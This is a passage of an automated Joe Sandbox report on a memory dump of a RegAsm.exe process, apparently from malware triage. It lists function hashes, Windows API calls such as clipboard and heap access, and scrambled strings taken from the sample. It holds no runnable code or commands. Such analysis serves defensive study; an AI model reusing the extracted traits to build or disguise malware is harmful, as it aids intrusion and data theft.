            • Opcode ID: f2df3bd0ba6a8576ac6632823765e9fc54261c1f47064a4c1da545078199b780
            • Instruction ID: 4d42e78689078bb1e512328da8b123497e3410b22b9a915000ca559236b053ce
            • Opcode Fuzzy Hash: f2df3bd0ba6a8576ac6632823765e9fc54261c1f47064a4c1da545078199b780
            • Instruction Fuzzy Hash: DD11C6B5A002658BDB00CF68C8857EEBBF2BF0A706F140819D495A7351D37CA9069F68

            Control-flow Graph

            Control-flow graph: single basic block 432111-432124 calling RtlAllocateHeap.
            APIs
            • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00432124
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID: 0!C
            • API String ID: 1279760036-3093313867
            • Opcode ID: 8753d004f219bdd7219b323af178a09c01ebe98d884d50b0ec1c769fd5c0165b
            • Instruction ID: 04cee9a2c7cb843de1264aaf56dcf5a1e572489f03cca6b25e53b27a8fc7ede0
            • Opcode Fuzzy Hash: 8753d004f219bdd7219b323af178a09c01ebe98d884d50b0ec1c769fd5c0165b
            • Instruction Fuzzy Hash: 3EB01270146110BCD03113114CD5FFF6C2C9F43F65F102024B204140C00754A001D07D

            Control-flow Graph

            Control-flow graph (graph edge list omitted): function 432140, basic blocks 432140-4321e7; API call RtlFreeHeap (block 4321cf-4321dc); no internal calls.
            APIs
            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004321DC
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 655819d9c0214d52ee193739dccee6f6407c7ea10fd06675cb2cd853cfd10b71
            • Instruction ID: 02542b3465e1523abc4de0e254be3dcfc07d2ba64744a3a3f7c2d606735d1a8a
            • Opcode Fuzzy Hash: 655819d9c0214d52ee193739dccee6f6407c7ea10fd06675cb2cd853cfd10b71
            • Instruction Fuzzy Hash: 4C11C271A192008BC708DF28D960A2FB7E2EFC5315F18CA2DD1C6473A5DA308811CB86
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: $K;M$%ki$'s7u$*/$+($2w0i$4:$8k>m$=?$?o;a$P?m1$T_$];]=$]_$cSam$d7Z)$e3l5$f#k!$o/d-$75$75$SQ$SQ$WU$WU$_]
            • API String ID: 0-3459135169
            • Opcode ID: 43e28df520d3bcad4ed6ffc926e2c98f2677454a2346b802433a89ba392a3010
            • Instruction ID: b3273fee3340c09fd2804797b29d5d6376960dfe39c91dec08cbd9ec68029d71
            • Opcode Fuzzy Hash: 43e28df520d3bcad4ed6ffc926e2c98f2677454a2346b802433a89ba392a3010
            • Instruction Fuzzy Hash: 8F420DB8900B568FD764CF25D58079AFBB1FB05300F509A9CD4AAAFB52C770A482CF85
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: >>B$?026$VVOT$WXM,$nLv.$zHPR
            • API String ID: 0-867834115
            • Opcode ID: 9bf2fd2a8e5effd6fcdbc20e51042f77b1d439974a595fd89c3280f55ff4f06a
            • Instruction ID: ea93a7a69c4b05680d95c06564036f72732313c29ab46c91309b5ec1a3ade140
            • Opcode Fuzzy Hash: 9bf2fd2a8e5effd6fcdbc20e51042f77b1d439974a595fd89c3280f55ff4f06a
            • Instruction Fuzzy Hash: 01E2AC70204B928AD325CF35D4907A7BBE1EF52305F58496ED4EB8B782C339A545CF98
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 8$IC$OI$RR$VA$_W$`c$s$wu$|w
            • API String ID: 0-2501553523
            • Opcode ID: 607335ce91f70844582d8ee9beb93bcaf837bf5f74a2caf647eb6b646c076283
            • Instruction ID: 10dfa4bddb72f2478a683de6888cf7fa89f560f853413485e885e4ec6dbba352
            • Opcode Fuzzy Hash: 607335ce91f70844582d8ee9beb93bcaf837bf5f74a2caf647eb6b646c076283
            • Instruction Fuzzy Hash: 0B7297B450C3808FD314DF29E491AABBBE1EFD6314F14892DE0D58B392D3399945CB9A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: *!"#$89$U1\3$W5Y7$X=3?$Z8rOOVpCGVmgWNTmDZS3RE039ad5UG9OEliujIvYDKQ-1724851747-0.0.1.1-/api$\9_;$uv<!$wDI{
            • API String ID: 0-3288668874
            • Opcode ID: 040cc6d3b2dfaad434a7d9b5a635a1e5cecabd74b452b2b531cf3e3ea92861fb
            • Instruction ID: 13237b498112c0df180c9789d066283ae5ca914d3e7ad719bbd32d58a6218ef1
            • Opcode Fuzzy Hash: 040cc6d3b2dfaad434a7d9b5a635a1e5cecabd74b452b2b531cf3e3ea92861fb
            • Instruction Fuzzy Hash: C6E1477010C3809BD311DF18C490A1FBBE1EF86758F588A6EE4D96B392C3399945CB9A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 7654$7654$76547654$ZgUY$c_^X
            • API String ID: 0-832553225
            • Opcode ID: 6419d35331c556af24202c309a051d92a7c5be69a0e6f0271b2b60e5c6cac6a1
            • Instruction ID: 490eac7359a3367a67c91254828de951180072d7f9268015f790fbff1f8a95c7
            • Opcode Fuzzy Hash: 6419d35331c556af24202c309a051d92a7c5be69a0e6f0271b2b60e5c6cac6a1
            • Instruction Fuzzy Hash: D252C074609302DFD704CF28D890A6AB7E2FF89314F18896DE995873A1D738EC91CB56
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: ($0$7641A8A9550F401098A04E632013B2C2$89$NDFB$dk$sghe$xG}E
            • API String ID: 0-2599710177
            • Opcode ID: 1b4427f46b020fa44aaeb7c5af4cf38baa070a64d270e3eeac5ef9614e8fc93d
            • Instruction ID: 3f2d1023407896c9d8e9c386dcd250c56f46485b4f734d3a90c8fec5e180debc
            • Opcode Fuzzy Hash: 1b4427f46b020fa44aaeb7c5af4cf38baa070a64d270e3eeac5ef9614e8fc93d
            • Instruction Fuzzy Hash: CEE114B01083809BD314DF19C490A2FBBF1EF96748F148A2DE5D99B3A2C7399855CB5B
            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Clipboard$CloseDataLongOpenWindow
            • String ID:
            • API String ID: 1647500905-0
            • Opcode ID: 3a232f2ebb08775f1998ed021a1bb97478409113e4e7ddd384c39079e02d75fb
            • Instruction ID: dbcac529509713fc5bea79e6a5e27dbcbb2f1d32715728547801cd2d791f9ed7
            • Opcode Fuzzy Hash: 3a232f2ebb08775f1998ed021a1bb97478409113e4e7ddd384c39079e02d75fb
            • Instruction Fuzzy Hash: 5B41A5B0A087928FD711AB7CA44436FBFE09B12320F448E2EE0E6977C1D6389945C757
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 2/$4`[b$4`[b$7654$;'
            • API String ID: 0-2626404024
            • Opcode ID: dead9a732aaef337ba81a8b97a69426f2b6bba6f41ebf8f4aaf15f91b6e2aa8a
            • Instruction ID: 26ea63534ae3e6bd61441c9169b9a728b07649db8703110e2030805014c08cb9
            • Opcode Fuzzy Hash: dead9a732aaef337ba81a8b97a69426f2b6bba6f41ebf8f4aaf15f91b6e2aa8a
            • Instruction Fuzzy Hash: 78E198B460C341DFE324DF28E890B6BBBE2FB86344F50882DE1D5872A1D7749845CB5A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$DD
            • API String ID: 0-2328339180
            • Opcode ID: b807664b0f23e44e8dfdd5e0703170624979a2ebacd0005b70fcfac8561d7c4b
            • Instruction ID: 8271e85c979b581454c923b7ae082495721ad2c20647ae81294568aa8489cf5c
            • Opcode Fuzzy Hash: b807664b0f23e44e8dfdd5e0703170624979a2ebacd0005b70fcfac8561d7c4b
            • Instruction Fuzzy Hash: D5F199B4908340DFD3149F28E890A6BBBF1EF8A348F44692DF1C587361D7799891CB4A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: <($@:$SP$pA
            • API String ID: 0-2096108754
            • Opcode ID: 8800ebda94bbcbceaaaab540bed2ff5570ed544b76802edd7efdae9079de000d
            • Instruction ID: 7340faad33d1629b880e59b953aa0262a307575ebe5f3bf1aba39aafcfb50f41
            • Opcode Fuzzy Hash: 8800ebda94bbcbceaaaab540bed2ff5570ed544b76802edd7efdae9079de000d
            • Instruction Fuzzy Hash: 3D029DB4E0021ACFDB04CF99D891AAEFBB1FF49300F148559E815AB396D734A941CF95
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$u s$}z{
            • API String ID: 0-2227352053
            • Opcode ID: 5bc1016c9887d98cd87b361dd3af6ff5bf015ecf9d6371ae1b25fb4791e535a8
            • Instruction ID: b1540de6ea930d979f3ac0be3d11990741c7919bfbe03e51bc4ef102b9e3bfad
            • Opcode Fuzzy Hash: 5bc1016c9887d98cd87b361dd3af6ff5bf015ecf9d6371ae1b25fb4791e535a8
            • Instruction Fuzzy Hash: B332ABB19083409FD710DF28C88166BB7E1FF89359F04492EE8D997352E338EA45CB5A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$7654
            • API String ID: 0-3675246634
            • Opcode ID: 762f7185b1c4e14a82dbf99af9a8724a603defb7888c91f406ae992e52300a96
            • Instruction ID: b4e1a4e571836c98069d91dca60e392b914ae0c73ff45b0ab22b483f2380cc65
            • Opcode Fuzzy Hash: 762f7185b1c4e14a82dbf99af9a8724a603defb7888c91f406ae992e52300a96
            • Instruction Fuzzy Hash: 6402E075D0121ACBCB14CF68C890AEEB7B2FF49300F19849AD841AB351D7399D92CB99
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$7654
            • API String ID: 0-3675246634
            • Opcode ID: 26ba02447477ea38d195325f5eb1c8a7aebefafab284258121ab35c6d5674d94
            • Instruction ID: 333ecfdf8dde34d4f6aa56c3055041ae65c4990cfcc230d53f1201f838be33fa
            • Opcode Fuzzy Hash: 26ba02447477ea38d195325f5eb1c8a7aebefafab284258121ab35c6d5674d94
            • Instruction Fuzzy Hash: 7381F0B1900219CBDB10CF58DC92AFB73B1FF49314F14416AE902AB391E7799A51CBA9
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: vT^8
            • API String ID: 0-144666228
            • Opcode ID: b38f1c914150a82d71dba4a7d34c916fa422f328e48b7d3e7041ec82bd7b7369
            • Instruction ID: 776c1141c75b7c48ae07388f2282c87ac763d8598ed6de0d22014516fa7d8ead
            • Opcode Fuzzy Hash: b38f1c914150a82d71dba4a7d34c916fa422f328e48b7d3e7041ec82bd7b7369
            • Instruction Fuzzy Hash: 2B028A70204B918ED325CF29D4907A7FBF1AF56304F58886EC4EA87B92C779E506CB58
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: z
            • API String ID: 0-1657960367
            • Opcode ID: 47a4703f915b1ed9d066ce045131ab22f6a65df2d17df319f2ed5deaab2be635
            • Instruction ID: e88c94cb3b04df96840fc0172771b105016a4bba1c105683a476d3149dcf9044
            • Opcode Fuzzy Hash: 47a4703f915b1ed9d066ce045131ab22f6a65df2d17df319f2ed5deaab2be635
            • Instruction Fuzzy Hash: 1602F2B1508341CFD725DF28D88076BB7E1AF96308F14493DE489A7392E739E849CB5A
            APIs
            • CoCreateInstance.OLE32(00439538,00000000,00000001,00439528), ref: 004185A9
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: CreateInstance
            • String ID:
            • API String ID: 542301482-0
            • Opcode ID: d5f447d211a7cba372c16b306cb673dcabc9674c1706a01d02b47f76867fc8f4
            • Instruction ID: c53532734e796bbb99004340195012868f4fa42433ebcb6ea21c5507683797a7
            • Opcode Fuzzy Hash: d5f447d211a7cba372c16b306cb673dcabc9674c1706a01d02b47f76867fc8f4
            • Instruction Fuzzy Hash: DB51DFB1600200ABDB209B24CC86BB733B4EF85358F28451DF9958B3D1EB78DC81C72A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: vT^8
            • API String ID: 0-144666228
            • Opcode ID: a3e3e63fcae0696028850abea55257ed1e89a5802acf22014d01533ab12af6b0
            • Instruction ID: 22b36863259243b647174d57ba2f837181b340375f30714746ca0cf978050850
            • Opcode Fuzzy Hash: a3e3e63fcae0696028850abea55257ed1e89a5802acf22014d01533ab12af6b0
            • Instruction Fuzzy Hash: 25E1BE70104B918FD366CF29C5507A7FBF1AF56304F9488AEC8EA8B782C779A905CB54
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b
            • API String ID: 0-3962175265
            • Opcode ID: 12a71d5f4cfc59184df24093cdc20bc31f4f7f729086096da5d0df1e0ebd6032
            • Instruction ID: c3bd3ee625d69e8edcc46d0a119240d42c353e60cc7f944bccecc0c9f18af3c7
            • Opcode Fuzzy Hash: 12a71d5f4cfc59184df24093cdc20bc31f4f7f729086096da5d0df1e0ebd6032
            • Instruction Fuzzy Hash: 04D1CFB16082009BD714EF14C891AABB7F1EF96354F08491EF8C597391E739ED81CB9A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: "
            • API String ID: 0-123907689
            • Opcode ID: 939dc505111095dae399a0b3139c9c85ded5718a9b0a5185b11e47deb40da2d0
            • Instruction ID: 68498b8493db956e5a25b608bae379dc603377d76d878f896cd3c4e5f10ba62c
            • Opcode Fuzzy Hash: 939dc505111095dae399a0b3139c9c85ded5718a9b0a5185b11e47deb40da2d0
            • Instruction Fuzzy Hash: 99C1F6B2B043215BD724DE24D481B6BBBD5AF84314F99852EE88587383D63CED44C7DA
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 7654
            • API String ID: 0-4024152101
            • Opcode ID: 3504394762c3f94a12b0f270924edc5e951516a17c3d17f5c9fd680f93e6bd29
            • Instruction ID: 7e542ee3ddbc02d0726da7b392e5b7563b94215d8191e3ce3909413af34983d8
            • Opcode Fuzzy Hash: 3504394762c3f94a12b0f270924edc5e951516a17c3d17f5c9fd680f93e6bd29
            • Instruction Fuzzy Hash: 5EA1AE75A19202CFD708CF28E89076AB3E2FF89311F1986BCE985873A5D734E951CB45
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: }{
            • API String ID: 0-2556126010
            • Opcode ID: 86fc7bbb8f71fa9e90ffa16d517ba7d6b08b3ad923dd2956ec98f4b4a303de33
            • Instruction ID: 1c8095d0e3db8fd1363295c4017b50b60a96a1c7182979d9b04a7b154951caee
            • Opcode Fuzzy Hash: 86fc7bbb8f71fa9e90ffa16d517ba7d6b08b3ad923dd2956ec98f4b4a303de33
            • Instruction Fuzzy Hash: 1E518DB4200602DFD324CF29C5A1A62B7F2FF4A350B24994DD4D6CBB54D379E8A1CB98
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: B
            • API String ID: 0-1255198513
            • Opcode ID: f7e32b4fc022e045620a3b265961e9345ef1b34c66be138370ccbbe0513876fa
            • Instruction ID: ae76bd3f89ee397e63b9bccb40564e20378e0b346a78422d95f96686f7635e10
            • Opcode Fuzzy Hash: f7e32b4fc022e045620a3b265961e9345ef1b34c66be138370ccbbe0513876fa
            • Instruction Fuzzy Hash: 214168706083808BD315DB28D881BAEBBF5AF96348F044C2DE1C9D7362D77A98958B57
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: @
            • API String ID: 2994545307-2766056989
            • Opcode ID: 055c23388ece44485477c6dc09a2d7129e63bbbc7650c81042cd163ed5f8e42a
            • Instruction ID: f722ca51760dcfb18ae79715c3000d80a43b571bf7b112194cb9bff4a1ec53d8
            • Opcode Fuzzy Hash: 055c23388ece44485477c6dc09a2d7129e63bbbc7650c81042cd163ed5f8e42a
            • Instruction Fuzzy Hash: 1031FC715083059FD300DF08C88166BFBF5FF89358F55992EE98887360D339E9098BAA
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b
            • API String ID: 0-3962175265
            • Opcode ID: 2e93865f553a4f5a092ef84bcd68ca5bb9323686f0a0824487b1fba554725558
            • Instruction ID: d76ead9e38f0ebf03a4d97c438e767dfbadc3f595c9280ab3cbc68496a962fe9
            • Opcode Fuzzy Hash: 2e93865f553a4f5a092ef84bcd68ca5bb9323686f0a0824487b1fba554725558
            • Instruction Fuzzy Hash: C3015B386083529BD318CF05D4A046FFBE2AFDA355F54992DE8CA533A1C334E881CB4A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: d>B
            • API String ID: 0-1770553647
            • Opcode ID: e65179d5fc362a254d7a78c5370ec306f83d82cf524f8830032bebd8a4b5c8b1
            • Instruction ID: 23d159685a26b8453a6add6a6c9c561a5425bbce7eb9bae6a5b29bf5e7ef4885
            • Opcode Fuzzy Hash: e65179d5fc362a254d7a78c5370ec306f83d82cf524f8830032bebd8a4b5c8b1
            • Instruction Fuzzy Hash: B4F08C2804C2E389C7028A3A60D0332BFA34FA7681F6D5182C0D00B352D73F8A0E866A
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: <B
            • API String ID: 0-741197489
            • Opcode ID: ba74ca6b23f664b2fe6cd97c599448c92381694e970d502f5621a21756412b00
            • Instruction ID: 56eddd5710ab9f3ba3c064f54dcf7cfd11df33fa5d5c1aa68379b27648139a91
            • Opcode Fuzzy Hash: ba74ca6b23f664b2fe6cd97c599448c92381694e970d502f5621a21756412b00
            • Instruction Fuzzy Hash: 8FF01220508292C9E7118F1A9050771FFB0AF63341B6860C798C56F293C36DDD97D669
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: db54d59c192d6b6fd14885a93f852d71f41e26016e9a19521493280c03582cbb
            • Instruction ID: dfef78953d44d306f3fabf23c5bb7017981e2830edf013e639bb80511372e877
            • Opcode Fuzzy Hash: db54d59c192d6b6fd14885a93f852d71f41e26016e9a19521493280c03582cbb
            • Instruction Fuzzy Hash: 8AF1BE716083418FC728CF29C881A2BFBE2EF95304F04892DE5D657791E275E954CB9A
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9d516b691b263f34783574b8d10e145400edb1a21f96742117e16c68cd1ed561
            • Instruction ID: 05e9d15e69f6221528390f51f9169826248a77df80b4759cd4aa61dd3306ed9b
            • Opcode Fuzzy Hash: 9d516b691b263f34783574b8d10e145400edb1a21f96742117e16c68cd1ed561
            • Instruction Fuzzy Hash: 82A1F1756083029BC728DF18D88092BB3F2FF89754F15992DE8858B361E739EC51CB96
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 83404a13c3c957f63282f6e511ac123ad5cbcdb76db1fccb295810a29c6b1e7a
            • Instruction ID: df0cd31c607533a98da9c19a4674afab0b99463390f81520ac9175c70ea4b2e2
            • Opcode Fuzzy Hash: 83404a13c3c957f63282f6e511ac123ad5cbcdb76db1fccb295810a29c6b1e7a
            • Instruction Fuzzy Hash: A581ABB490022A8BDB14CF54C8A07BFB7B1FF56304F144A5DD8562B795E3386946CBA8
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c4340e28113e2f416eac9606e51f57f28b22c221dfb8cca225654b0e3f015c99
            • Instruction ID: d80a1476e36663fc0f1e44782cbadfce23121eedbcbac17c6fe514ae84ba342f
            • Opcode Fuzzy Hash: c4340e28113e2f416eac9606e51f57f28b22c221dfb8cca225654b0e3f015c99
            • Instruction Fuzzy Hash: A271A4B19083518BD725CF24C48076BB7E5AF96324F140D3EE889A73D1D735E888C79A
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2580786246c3d70e228bd320d61a6e399c2246324a796232639fc0e6287388a9
            • Instruction ID: 6fb870906a14a99ae7522ebce49e0dce1299c4cad0614e065919b308ab25f387
            • Opcode Fuzzy Hash: 2580786246c3d70e228bd320d61a6e399c2246324a796232639fc0e6287388a9
            • Instruction Fuzzy Hash: D341E7729583928FD710AF58C8C039BBBE1EB96340F19492EE4C597341D378D885C7DA
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1fdb1793cd73c7b7f0bc918e7d4c72ca26648cb6ca977c2709b6ccd04db6e54b
            • Instruction ID: b78f1c056aa8a07ff43ace1c20bbe993874da313b6e81b065cc51acc4efad157
            • Opcode Fuzzy Hash: 1fdb1793cd73c7b7f0bc918e7d4c72ca26648cb6ca977c2709b6ccd04db6e54b
            • Instruction Fuzzy Hash: 3121EF74A08302ABD714DF04C880A6FB7E2FFC9754F15D82EE8944B251D738ED418B9A
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
            • Instruction ID: 1a79eac26aafbfa0544ef3d7ab2b42f3791513668a3b9443077eb0652731c0b6
            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
            • Instruction Fuzzy Hash: 9711A933B052F40EC3168D3C94105A5BFA31AE3635F9943DAF4B99B3D2D6268D8A8359
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1d78475d16ca2dbc92dfad9f182ff1db781027909e5738ff1e453e2f1f223716
            • Instruction ID: d3e7e8a303244157a839e7ca479edec190b5416b95b20cc82094d503180c8648
            • Opcode Fuzzy Hash: 1d78475d16ca2dbc92dfad9f182ff1db781027909e5738ff1e453e2f1f223716
            • Instruction Fuzzy Hash: 1C019EB1B0131157F6219E51A8C173BB2E8AB84718F48013EE8085B343DB7EEC25C299
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
